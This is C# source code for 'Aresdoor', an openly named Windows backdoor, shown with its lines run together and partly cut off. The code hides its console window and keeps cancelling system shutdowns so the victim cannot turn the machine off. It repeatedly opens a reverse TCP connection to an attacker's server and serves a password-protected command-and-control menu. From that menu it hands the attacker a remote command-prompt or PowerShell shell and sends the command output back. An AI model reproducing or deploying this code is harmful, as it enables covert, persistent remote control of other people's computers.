public bool CommandPromptBackdoor(System.Net.Sockets.TcpClient tcpClient) { while (true) { // Send shellcode to attacker nc.DataTravelTO(tcpClient, System.IO.Directory.GetCurrentDirectory() + "> "); // Recieve response from client application string responseFromServer = nc.DataTravelFROM(tcpClient); if (responseFromServer.Contains("cd")) { System.IO.Directory.SetCurrentDirectory(responseFromServer.Split(" ".ToCharArray())[1]); } else if (responseFromServer.Contains("exit")) { return(false); } else { try { nc.DataTravelTO(tcpClient, CommandShell.execCommandPrompt(responseFromServer)); } // Execute command and send output to attacker }
static void Main(string[] args) { /* * Usage: * ./aresdoor.exe [server] [port] * or * ./aresdoor.exe (no args) << requires hardcoded configuration * */ #if !DEBUG /* Hide console if debug mode is disabled. */ var handle = GetConsoleWindow(); ShowWindow(handle, SW_HIDE); // hide window #endif /* Intercept command line arguments if any are found. */ try { if (args.Length >= 2) { server = args[0]; port = Int32.Parse(args[1]); } } catch (Exception exc) { Console.WriteLine(exc.Message); } /* Undertermined code. Not sure if it's required or not? */ if (System.Diagnostics.Process.GetProcessesByName(System.Diagnostics.Process.GetCurrentProcess().ToString()).Length != 0) { System.Environment.Exit(0); } /* Prevent the client (victim) from shutting down the computer */ if (prevent_shutdown == true) { new System.Threading.Thread(() => { System.Threading.Thread.CurrentThread.IsBackground = true; while (true) { System.Diagnostics.Process process = new System.Diagnostics.Process(); process.StartInfo.FileName = "shutdown.exe"; process.StartInfo.Arguments = "-a"; process.StartInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden; process.Start(); process.WaitForExit(); System.Threading.Thread.Sleep(2000); } }).Start(); } /* Persistant backdoor connection */ persistantBackdoor: while (true) { if (Networking.checkInternetConn(server)) // Determine if the victim is able to connect to the attacker via DHCP (ping) request { try { #if DEBUG Console.WriteLine("Sending backdoor to: {0}, port: {1}", server, port); #endif // Define a couple of variables that set our connection target System.Net.Sockets.TcpClient tcpClient = new System.Net.Sockets.TcpClient(server, port); // Custom class/method instances NetworkCommunication nc = new NetworkCommunication(); BackdoorCollection bc = new BackdoorCollection(); // Write in loop for a persistant connection while (true) { candcmenu: if (backdoorPassword != "") { nc.DataTravelTO(tcpClient, "This copy of Aresdoor has been password protected.\n\n"); inputPassword: nc.DataTravelTO(tcpClient, "Password: "******"\n", string.Empty) != backdoorPassword) { nc.DataTravelTO(tcpClient, "Access denied.\n\n"); goto inputPassword; } // else continue } string aresdoorStartMenu = string.Empty; string responseFromServer = string.Empty; aresdoorStartMenu += "+-------------------------------------------------------------+\n"; aresdoorStartMenu += "| Welcome to Aresdoor - a backdoor written by @BlackVikingPro |\n"; aresdoorStartMenu += "| Current Version: v1.3.1 |\n"; aresdoorStartMenu += "| |\n"; aresdoorStartMenu += "| C&C Menu Version: v1.0 |\n"; aresdoorStartMenu += "+-------------------------------------------------------------+\n"; aresdoorStartMenu += "\nPlease select an option below:\n"; aresdoorStartMenu += " 1) Command Prompt Backdoor\n"; aresdoorStartMenu += " 2) Powershell Backdoor\n"; aresdoorStartMenu += " 3) Exit\n\n"; nc.DataTravelTO(tcpClient, "\n" + aresdoorStartMenu); optionInputDisplay: // Define a mark for requesting an option to be inputted nc.DataTravelTO(tcpClient, "aresdoor> "); // Wait for a response responseFromServer = nc.DataTravelFROM(tcpClient); responseFromServer = responseFromServer.Replace("\n", string.Empty).Replace(" ", string.Empty); if (responseFromServer == "1") { while (bc.CommandPromptBackdoor(tcpClient)) { } goto candcmenu; } else if (responseFromServer == "2") { while (bc.PowershellBackdoor(tcpClient)) { } goto candcmenu; } else if (responseFromServer == "3" || responseFromServer == "exit") { nc.DataTravelTO(tcpClient, "Closing TCP Connection... You have 5 seconds before another shell is spawned.\n"); nc.CloseTCPStream(tcpClient); System.Threading.Thread.Sleep(5000); goto persistantBackdoor; } else if (responseFromServer == "") { goto optionInputDisplay; } else { nc.DataTravelTO(tcpClient, "Sorry, \"" + responseFromServer + "\" is not a recognized command.\n"); goto optionInputDisplay; } } // sendBackdoor(server, port); } #if DEBUG catch (Exception exc) { Console.WriteLine(exc.Message); goto persistantBackdoor; } // pass silently unless debug mode is enabled #else catch (Exception) { goto persistantBackdoor; } #endif } #if DEBUG else { Console.WriteLine("Couldn't connect to {0}:{1}. Retrying in 5 seconds...", Networking.resolveHostName(server), port); }